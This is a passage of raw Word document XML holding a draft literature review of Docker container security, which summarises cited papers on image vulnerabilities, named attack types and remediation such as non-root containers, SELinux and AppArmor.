        <w:t>discuss</w:t>
      </w:r>
      <w:r w:rsidR="006051A8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00522F5B">
        <w:t xml:space="preserve">the main </w:t>
      </w:r>
      <w:r w:rsidR="001B387E">
        <w:t>issues</w:t>
      </w:r>
      <w:r w:rsidR="00522F5B">
        <w:t xml:space="preserve"> that constitute</w:t>
      </w:r>
      <w:r w:rsidR="00C71C36">
        <w:t xml:space="preserve"> the vulnerability</w:t>
      </w:r>
      <w:r w:rsidR="009843D5">
        <w:t xml:space="preserve"> of images and repositories</w:t>
      </w:r>
      <w:r w:rsidR="00435FD3">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00792411">
        <w:t xml:space="preserve"> Any i</w:t>
      </w:r>
      <w:r w:rsidR="006E36DA">
        <w:t xml:space="preserve">mages </w:t>
      </w:r>
      <w:r w:rsidR="00301C38">
        <w:t xml:space="preserve">or repositories </w:t>
      </w:r>
      <w:r w:rsidR="000A6A72">
        <w:t>from untrusted</w:t>
      </w:r>
      <w:r w:rsidR="00B755E4">
        <w:t xml:space="preserve"> sources </w:t>
      </w:r>
      <w:r w:rsidR="005919F5">
        <w:t xml:space="preserve">can be </w:t>
      </w:r>
      <w:r w:rsidR="008F77AF">
        <w:t>susceptible</w:t>
      </w:r>
      <w:r w:rsidR="00515FFC">
        <w:t xml:space="preserve"> or with malicious intent.</w:t>
      </w:r>
      <w:r w:rsidR="00853B53">
        <w:t xml:space="preserve"> The researchers </w:t>
      </w:r>
      <w:r w:rsidR="00EF2705">
        <w:t>insist</w:t>
      </w:r>
      <w:r w:rsidR="00202626">
        <w:t xml:space="preserve"> that</w:t>
      </w:r>
      <w:r w:rsidR="00EF2705">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E34361">
        <w:t xml:space="preserve">images </w:t>
      </w:r>
      <w:r w:rsidR="001035B7">
        <w:t xml:space="preserve">need to be scanned and verified </w:t>
      </w:r>
      <w:r w:rsidR="00CE149B">
        <w:t>using tools</w:t>
      </w:r>
      <w:r w:rsidR="004020D6">
        <w:t xml:space="preserve"> and conclude that images </w:t>
      </w:r>
      <w:r w:rsidR="00380F27">
        <w:t>must be built</w:t>
      </w:r>
      <w:r w:rsidR="004020D6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C5267E">
        <w:t>carefully to avoid</w:t>
      </w:r>
      <w:r w:rsidR="00D43BFB">
        <w:t xml:space="preserve"> significant</w:t>
      </w:r>
      <w:r w:rsidR="00C5267E">
        <w:t xml:space="preserve"> security flaws.</w:t>
      </w:r>
      <w:r w:rsidR="00426671">
        <w:t xml:space="preserve"> This paper </w:t>
      </w:r>
      <w:r w:rsidR="00DD5C74">
        <w:t xml:space="preserve">provided a thorough </w:t>
      </w:r>
      <w:r w:rsidR="00424E1C">
        <w:t xml:space="preserve">vulnerability analysis </w:t>
      </w:r>
      <w:r w:rsidR="002604BA">
        <w:t xml:space="preserve">of Docker images and </w:t>
      </w:r>
      <w:r w:rsidR="00042F8E">
        <w:t>highli</w:t>
      </w:r>
      <w:r w:rsidR="00523870">
        <w:t xml:space="preserve">ghted the </w:t>
      </w:r>
      <w:r w:rsidR="00710567">
        <w:t xml:space="preserve">various security </w:t>
      </w:r>
      <w:r w:rsidR="007954EC">
        <w:t>tools.</w:t>
      </w:r>
      <w:r w:rsidR="006E4A3F">
        <w:t xml:space="preserve"> However, </w:t>
      </w:r>
      <w:r w:rsidR="00B5474B">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="004428B0">
        <w:t xml:space="preserve">paper does not </w:t>
      </w:r>
      <w:r w:rsidR="00F94F23">
        <w:t>provide</w:t>
      </w:r>
      <w:r w:rsidR="00634832">
        <w:t xml:space="preserve"> a</w:t>
      </w:r>
      <w:r w:rsidR="00F94F23">
        <w:t xml:space="preserve"> practical approach</w:t>
      </w:r>
      <w:r w:rsidR="00E561B9">
        <w:t xml:space="preserve"> to conduct security attacks on Docker systems</w:t>
      </w:r>
      <w:r w:rsidR="00944C56" w:rsidRPr="00944C56">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-2013290145"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00944C56">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00944C56">
            <w:instrText xml:space="preserve"> CITATION VJa21 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="00944C56">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[73]</w:t>
          </w:r>
          <w:r w:rsidR="00944C56">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00E561B9">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00944C56">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="050A8E5E" w14:textId="79146920" w:rsidR="00DB0226" w:rsidRDefault="00130B5C" w:rsidP="009048CA">
      <w:r>
        <w:t xml:space="preserve">Docker </w:t>
      </w:r>
      <w:r w:rsidR="003327BD">
        <w:t xml:space="preserve">is </w:t>
      </w:r>
      <w:r w:rsidR="00C33139">
        <w:t>formed</w:t>
      </w:r>
      <w:r w:rsidR="007919EA">
        <w:t xml:space="preserve"> on Linux subsystem features</w:t>
      </w:r>
      <w:r w:rsidR="00DF4B10">
        <w:t xml:space="preserve">, and thus its security </w:t>
      </w:r>
      <w:r w:rsidR="0068114E">
        <w:t xml:space="preserve">aspect covers a wide range </w:t>
      </w:r>
      <w:r w:rsidR="0093181A">
        <w:t>of technolog</w:t>
      </w:r>
      <w:r w:rsidR="003C67E2">
        <w:t>ies.</w:t>
      </w:r>
      <w:r w:rsidR="00135C53">
        <w:t xml:space="preserve"> It uses </w:t>
      </w:r>
      <w:r w:rsidR="00153BCB">
        <w:t>Linux kernel mechanism</w:t>
      </w:r>
      <w:r w:rsidR="008B5153">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="003068DE">
        <w:t>, such as namespaces and Cgroups</w:t>
      </w:r>
      <w:r w:rsidR="000F5F27">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00B64B2F">
        <w:t xml:space="preserve"> to provide isolation and resource allocation.</w:t>
      </w:r>
      <w:r w:rsidR="00F437D5">
        <w:t xml:space="preserve"> Consequently, </w:t>
      </w:r>
      <w:r w:rsidR="00757518">
        <w:t xml:space="preserve">its security posture </w:t>
      </w:r>
      <w:r w:rsidR="009B7B47">
        <w:t xml:space="preserve">is heavily reliant on those </w:t>
      </w:r>
      <w:r w:rsidR="00982075">
        <w:t>Linux features.</w:t>
      </w:r>
      <w:r w:rsidR="000E2612">
        <w:t xml:space="preserve"> Yasrib</w:t>
      </w:r>
      <w:r w:rsidR="00982075">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00706859">
        <w:t>in</w:t>
      </w:r>
      <w:r w:rsidR="003C4223">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="56" w:name="_Hlk80742567"/>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="1233278042"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00394F75">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00394F75">
            <w:instrText xml:space="preserve"> CITATION RYa18 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="00394F75">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[51]</w:t>
          </w:r>
          <w:r w:rsidR="00394F75">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:bookmarkEnd w:id="56"/>
      <w:r w:rsidR="00574392">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0084052D">
        <w:t xml:space="preserve">presented </w:t>
      </w:r>
      <w:r w:rsidR="003A5173">
        <w:t xml:space="preserve">and reviewed the </w:t>
      </w:r>
      <w:r w:rsidR="00915DE1">
        <w:t xml:space="preserve">potential </w:t>
      </w:r>
      <w:r w:rsidR="003A5173">
        <w:t xml:space="preserve">security </w:t>
      </w:r>
      <w:r w:rsidR="007D6629">
        <w:t xml:space="preserve">attacks </w:t>
      </w:r>
      <w:r w:rsidR="00B231D6">
        <w:t>on</w:t>
      </w:r>
      <w:r w:rsidR="00AD5F0F">
        <w:t xml:space="preserve"> the</w:t>
      </w:r>
      <w:r w:rsidR="00B231D6">
        <w:t xml:space="preserve"> Docker ecosystem</w:t>
      </w:r>
      <w:r w:rsidR="006F4E54">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003910EB">
        <w:t>along with</w:t>
      </w:r>
      <w:r w:rsidR="006F4E54">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00241866">
        <w:t>a brief comparison between VM and containers</w:t>
      </w:r>
      <w:r w:rsidR="00B231D6">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="004E5D3F">
        <w:t xml:space="preserve"> This work </w:t>
      </w:r>
      <w:r w:rsidR="002A193B">
        <w:lastRenderedPageBreak/>
        <w:t>details</w:t>
      </w:r>
      <w:r w:rsidR="004E5D3F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00812030">
        <w:t xml:space="preserve">the most </w:t>
      </w:r>
      <w:r w:rsidR="00046CE2">
        <w:t xml:space="preserve">common </w:t>
      </w:r>
      <w:r w:rsidR="002A193B">
        <w:t xml:space="preserve">Docker </w:t>
      </w:r>
      <w:r w:rsidR="00812030">
        <w:t xml:space="preserve">security attacks </w:t>
      </w:r>
      <w:r w:rsidR="002A193B">
        <w:t>along with their rem</w:t>
      </w:r>
      <w:r w:rsidR="007C5A06">
        <w:t>ediation strategies.</w:t>
      </w:r>
      <w:r w:rsidR="00901D53">
        <w:t xml:space="preserve"> The attacks are classified into two main groups</w:t>
      </w:r>
      <w:r w:rsidR="00BF2BD0">
        <w:t>: insider</w:t>
      </w:r>
      <w:r w:rsidR="00404959">
        <w:t xml:space="preserve"> and outsider.</w:t>
      </w:r>
      <w:r w:rsidR="00A513E3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00840EA6">
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="00620BEC">
        <w:t xml:space="preserve">he </w:t>
      </w:r>
      <w:r w:rsidR="00A513E3">
        <w:t xml:space="preserve">insider security vulnerabilities </w:t>
      </w:r>
      <w:r w:rsidR="00546701">
        <w:t xml:space="preserve">can be avoided </w:t>
      </w:r>
      <w:r w:rsidR="00620BEC">
        <w:t xml:space="preserve">through </w:t>
      </w:r>
      <w:r w:rsidR="00E42062">
        <w:t xml:space="preserve">some configuration </w:t>
      </w:r>
      <w:r w:rsidR="004036A7">
        <w:t>on Docker, such as enabling -selinux flag.</w:t>
      </w:r>
      <w:r w:rsidR="00C75854">
        <w:t xml:space="preserve"> On the other hand, outside attacks </w:t>
      </w:r>
      <w:r w:rsidR="00495ABB">
        <w:t xml:space="preserve">can be prevented </w:t>
      </w:r>
      <w:r w:rsidR="000A06D3">
        <w:t>by</w:t>
      </w:r>
      <w:r w:rsidR="00495ABB">
        <w:t xml:space="preserve"> disabling or removing </w:t>
      </w:r>
      <w:r w:rsidR="001F70BE">
        <w:t xml:space="preserve">some capabilities </w:t>
      </w:r>
      <w:r w:rsidR="00C16559">
        <w:t>features on containers.</w:t>
      </w:r>
      <w:r w:rsidR="00D029C5">
        <w:t xml:space="preserve"> S</w:t>
      </w:r>
      <w:r w:rsidR="008F4907">
        <w:t>ome</w:t>
      </w:r>
      <w:r w:rsidR="009A23F7">
        <w:t xml:space="preserve"> of the </w:t>
      </w:r>
      <w:r w:rsidR="00EB2AF7">
        <w:t>attacks include</w:t>
      </w:r>
      <w:r w:rsidR="000A3EEC">
        <w:t xml:space="preserve"> poisoned images, ARP poisoning, MitM</w:t>
      </w:r>
      <w:r w:rsidR="00631CF0">
        <w:t>, Dos</w:t>
      </w:r>
      <w:r w:rsidR="007C38EC">
        <w:t>, secret compromised, and container breakout.</w:t>
      </w:r>
      <w:r w:rsidR="00B86E61">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31F9D6A6" w14:textId="365C1207" w:rsidR="00677D92" w:rsidRDefault="005215CE" w:rsidP="009048CA">
      <w:r>
        <w:t xml:space="preserve">Further, the </w:t>
      </w:r>
      <w:r w:rsidR="00D813E1">
        <w:t xml:space="preserve">author offers remediation </w:t>
      </w:r>
      <w:r w:rsidR="0029409C">
        <w:t xml:space="preserve">techniques </w:t>
      </w:r>
      <w:r w:rsidR="006E61F6">
        <w:t xml:space="preserve">to prevent these security </w:t>
      </w:r>
      <w:r w:rsidR="00EC1EFA">
        <w:t>threats and</w:t>
      </w:r>
      <w:r w:rsidR="00141B7A">
        <w:t xml:space="preserve"> recommends</w:t>
      </w:r>
      <w:r w:rsidR="002C0571">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DE2FE8">
        <w:t xml:space="preserve">that </w:t>
      </w:r>
      <w:r w:rsidR="002C0571">
        <w:t>for</w:t>
      </w:r>
      <w:r w:rsidR="00141B7A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002C0571">
        <w:t xml:space="preserve">Docker </w:t>
      </w:r>
      <w:r w:rsidR="00463359">
        <w:t xml:space="preserve">users to run a process under non-root privilege when it is running inside a container to avoid privilege </w:t>
      </w:r>
      <w:r w:rsidR="003B0727">
        <w:t>and Dos attacks</w:t>
      </w:r>
      <w:r w:rsidR="00DE2FE8">
        <w:t>-a</w:t>
      </w:r>
      <w:r w:rsidR="00D14AB3">
        <w:t xml:space="preserve">nd also enabling </w:t>
      </w:r>
      <w:r w:rsidR="00681E83">
        <w:t>Linux kernel features, such as SELinux and AppArmor</w:t>
      </w:r>
      <w:r w:rsidR="00145FBD">
        <w:t>, to provide additional security for Docker environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35AEE0DB" w14:textId="28C8949B" w:rsidR="00D029C5" w:rsidRDefault="001A1E40" w:rsidP="009048CA">
      <w:r>
        <w:t xml:space="preserve">This work </w:t>
      </w:r>
      <w:r w:rsidR="00A9694A">
        <w:t xml:space="preserve">insists to run a process under non-root privilege when it is running </w:t>
      </w:r>
      <w:r w:rsidR="00EF2FEE">
        <w:t>inside a container and</w:t>
      </w:r>
      <w:r w:rsidR="009C54D6">
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r w:rsidR="00EF2FEE">
        <w:t>enable</w:t>
      </w:r>
      <w:r w:rsidR="009C54D6">
        <w:t xml:space="preserve"> Linux kernel features, such as SELinux </w:t>
      </w:r>
      <w:r w:rsidR="007D03DE">
        <w:t>and AppArmor.</w:t>
      </w:r>
      <w:r w:rsidR="00EF2FEE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000B3946">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009C49EE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E78A4CA" w14:textId="53E93BFB" w:rsidR="00552087" w:rsidRPr="009048CA" w:rsidRDefault="008A1E85" w:rsidP="009048CA">
      <w:r>
        <w:t xml:space="preserve">It also covers a brief comparison </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EFAC4B9" w14:textId="57A20222" w:rsidR="00781901" w:rsidRDefault="005215CE" w:rsidP="009048CA">
      <w:r>
        <w:t xml:space="preserve">Further, the </w:t>
      </w:r>
      <w:r w:rsidR="00D813E1">
        <w:t>author</w:t>
      </w:r>
      <w:r w:rsidR="002911B6">
        <w:t xml:space="preserve"> in </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-1039585657"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="002911B6">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="002911B6">
            <w:instrText xml:space="preserve"> CITATION RYa18 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="002911B6">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[51]</w:t>
          </w:r>
          <w:r w:rsidR="002911B6">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="002911B6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D813E1">
        <w:t xml:space="preserve">offers remediation </w:t>
      </w:r>
      <w:r w:rsidR="0029409C">
        <w:t xml:space="preserve">techniques </w:t>
      </w:r>
      <w:r w:rsidR="006E61F6">
        <w:t xml:space="preserve">to prevent these security </w:t>
      </w:r>
      <w:r w:rsidR="00EC1EFA">
        <w:t>threats and</w:t>
      </w:r>
      <w:r w:rsidR="00141B7A">
        <w:t xml:space="preserve"> recommends</w:t>
      </w:r>
      <w:r w:rsidR="002C0571">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DE2FE8">
        <w:t xml:space="preserve">that </w:t>
      </w:r>
      <w:r w:rsidR="002C0571">
        <w:t>for</w:t>
      </w:r>
      <w:r w:rsidR="00141B7A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002C0571">
        <w:t xml:space="preserve">Docker </w:t>
      </w:r>
      <w:r w:rsidR="00463359">
        <w:t xml:space="preserve">users to run a process under non-root privilege when it is running inside a container to avoid privilege </w:t>
      </w:r>
      <w:r w:rsidR="003B0727">
        <w:t>and Dos attacks</w:t>
      </w:r>
      <w:r w:rsidR="00DE2FE8">
        <w:t>-a</w:t>
      </w:r>
      <w:r w:rsidR="00D14AB3">
        <w:t xml:space="preserve">nd also enabling </w:t>
      </w:r>
      <w:r w:rsidR="00681E83">
        <w:t>Linux kernel features, such as SELinux and AppArmor</w:t>
      </w:r>
      <w:r w:rsidR="00145FBD">
        <w:t>, to provide additional security for Docker environment.</w:t>
      </w:r>
      <w:r w:rsidR="002E3032">
        <w:t xml:space="preserve"> Lastly, the author propose</w:t>
      </w:r>
      <w:r w:rsidR="00176EAC">
        <w:t xml:space="preserve">d implementing </w:t>
      </w:r>
      <w:r w:rsidR="00781901">
        <w:t xml:space="preserve">access control policies </w:t>
      </w:r>
      <w:r w:rsidR="002911B6">
        <w:t xml:space="preserve">using </w:t>
      </w:r>
      <w:r w:rsidR="00781901">
        <w:t xml:space="preserve">SELinux modules </w:t>
      </w:r>
      <w:r w:rsidR="002911B6">
        <w:t>and guidelines to a secure deployment process to ensure a safe and secure Docker environment. This article is well documented and provides detailed</w:t>
      </w:r>
      <w:r w:rsidR="00407E0D">
        <w:t xml:space="preserve"> research of various Docker security challenges</w:t>
      </w:r>
      <w:r w:rsidR="00E85971">
        <w:t>, though it contains less reference count</w:t>
      </w:r>
      <w:r w:rsidR="00407E0D">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00E85971">
        <w:t xml:space="preserve"> I</w:t>
      </w:r>
      <w:r w:rsidR="00407E0D">
        <w:t xml:space="preserve">t </w:t>
      </w:r>
      <w:r w:rsidR="00E85971">
        <w:t>also lacks practical or experimental approach to demonstrate attacks</w:t>
      </w:r>
      <w:r w:rsidR="00416917" w:rsidRPr="00416917">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-1667625125"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00416917">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00416917">
            <w:instrText xml:space="preserve"> CITATION RYa18 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="00416917">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[51]</w:t>
          </w:r>
          <w:r w:rsidR="00416917">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00E85971">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00416917">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A860D37" w14:textId="28203DEA" w:rsidR="000E0A85" w:rsidRDefault="00D64D4B" w:rsidP="009048CA">
      <w:r>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidR="000E0A85">
        <w:t>Docker ecosystem involves various technologies and components</w:t>
      </w:r>
      <w:r>
        <w:t>, and therefore its security area is extensive and covers different parts and platforms.</w:t>
      </w:r>
      <w:r w:rsidR="006E631D">
        <w:t xml:space="preserve"> Some security threat can arise either from the host machine or the container. </w:t>
      </w:r>
      <w:r>
        <w:t>An extensive</w:t>
      </w:r>
      <w:r w:rsidR="005A5258">
        <w:t xml:space="preserve"> and general-purpose</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> study of </w:t>
      </w:r>
      <w:r w:rsidR="00F51FE9">
        <w:t xml:space="preserve">containerisation </w:t>
      </w:r>
      <w:r>
        <w:t>security challenge and issues is p</w:t>
      </w:r>
      <w:r w:rsidR="005A5258">
        <w:t>resented</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> in </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="2064284084"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00CF1A1D">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00CF1A1D">
            <w:instrText xml:space="preserve"> CITATION SSu19 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="00CF1A1D">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[74]</w:t>
          </w:r>
          <w:r w:rsidR="00CF1A1D">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00CF1A1D">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00F51FE9">
        <w:t xml:space="preserve"> This wor</w:t>
      </w:r>
      <w:r w:rsidR="005A5258">
        <w:t xml:space="preserve">k </w:t>
      </w:r>
      <w:r w:rsidR="00BF00F2">
        <w:t>classified the security requirements into four main groups based on the context of the host-container landscape.</w:t>
      </w:r>
      <w:r w:rsidR="00411EC0">
        <w:t xml:space="preserve"> According to the authors, the </w:t>
      </w:r>
      <w:r w:rsidR="006E631D">
        <w:t xml:space="preserve">security threats </w:t>
      </w:r>
      <w:r w:rsidR="00411EC0">
        <w:t>occur in four areas: inter-container, application to a container, container to host, and host to container.</w:t>
      </w:r>
      <w:r w:rsidR="00F12D9A">
        <w:t xml:space="preserve"> The first three ca</w:t>
      </w:r>
      <w:r w:rsidR="001E677A">
        <w:t xml:space="preserve">ses </w:t>
      </w:r>
      <w:r w:rsidR="00F12D9A">
        <w:t xml:space="preserve">employ Linux kernel features (namespaces and Cgroups), while the </w:t>
      </w:r>
      <w:r w:rsidR="001E677A">
        <w:t xml:space="preserve">last case utilises hardware solutions, such as a trusted platform module (TPM) and trusted platform support, to mitigate </w:t>
      </w:r>
      <w:r w:rsidR="001E677A">
        <w:lastRenderedPageBreak/>
        <w:t>such attacks on containers.</w:t>
      </w:r>
      <w:r w:rsidR="0024188D">
        <w:t xml:space="preserve"> This work </w:t>
      </w:r>
      <w:r w:rsidR="003D6072">
        <w:t>briefly covers</w:t>
      </w:r>
      <w:r w:rsidR="0024188D">
        <w:t xml:space="preserve"> the security of containers </w:t>
      </w:r>
      <w:r w:rsidR="003D6072">
        <w:t>with a wide range of credible sources</w:t>
      </w:r>
      <w:r w:rsidR="003D6072" w:rsidRPr="003D6072">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-839617577"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="003D6072">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="003D6072">
            <w:instrText xml:space="preserve"> CITATION SSu19 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="003D6072">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[74]</w:t>
          </w:r>
          <w:r w:rsidR="003D6072">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="003D6072">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F72E26" w14:textId="22F89F64" w:rsidR="00330417" w:rsidRDefault="00510400" w:rsidP="009048CA">
      <w:r>
        <w:t xml:space="preserve">The authors in </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-1274472480"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> CITATION SPM20 \l 2057 </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[75]</w:t>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00B97DD5">
        <w:t xml:space="preserve"> investigated Docker’s security concern, particularly with public Docker images, using static and dynamic analysis approaches.</w:t>
      </w:r>
      <w:r w:rsidR="00DB730B">
        <w:t xml:space="preserve"> They</w:t>
      </w:r>
      <w:r w:rsidR="002E2E63">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00896764">
        <w:t xml:space="preserve">also </w:t>
      </w:r>
      <w:r w:rsidR="00DB730B">
        <w:t xml:space="preserve">evaluated </w:t>
      </w:r>
      <w:r w:rsidR="007F72A1">
        <w:t>and compared current security tools and technologies using different metrics base</w:t>
      </w:r>
      <w:r w:rsidR="00896764">
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidR="007F72A1">
        <w:t xml:space="preserve"> on </w:t>
      </w:r>
      <w:r w:rsidR="00896764">
        <w:t xml:space="preserve">previous works done by other researchers. </w:t>
      </w:r>
      <w:r w:rsidR="002E2E63">
        <w:t xml:space="preserve">Malicious or vulnerable images can be discovered using </w:t>
      </w:r>
      <w:r w:rsidR="00896764">
        <w:t>tools and vulnerability assessment, like common vulnerabilities and exposures (CVE).</w:t>
      </w:r>
      <w:r w:rsidR="00900955">
        <w:t xml:space="preserve"> In the paper, Docker uses Notary </w:t>
      </w:r>
      <w:r w:rsidR="005F4EB5">
        <w:t xml:space="preserve">as a de facto tool </w:t>
      </w:r>
      <w:r w:rsidR="00900955">
        <w:t>find vulnerabilities</w:t>
      </w:r>
      <w:r w:rsidR="005F4EB5">
        <w:t xml:space="preserve"> and to provide secure method of publishing and verifying content over a </w:t>
      </w:r>
      <w:r w:rsidR="006B1802">
        <w:t>distributed network. Further, the authors compared static and dynamic analysis methods. Their research shows that dynamic analysis provides better security but takes more time. This work conclude</w:t>
      </w:r>
      <w:r w:rsidR="00E32151">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="006B1802">
        <w:t xml:space="preserve"> that Docker images need to be monitored and scanned regularly</w:t>
      </w:r>
      <w:r w:rsidR="00E32151">
        <w:t xml:space="preserve"> to prevent malicious attacks. A major limitation of this paper is that it does not provide a practical analysis of Docker security and has less reference number</w:t>
      </w:r>
      <w:r w:rsidR="00E32151" w:rsidRPr="00E32151">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-819112451"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00E32151">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00E32151">
            <w:instrText xml:space="preserve"> CITATION SPM20 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="00E32151">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[75]</w:t>
          </w:r>
          <w:r w:rsidR="00E32151">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00E32151">
        <w:t>.</w:t>
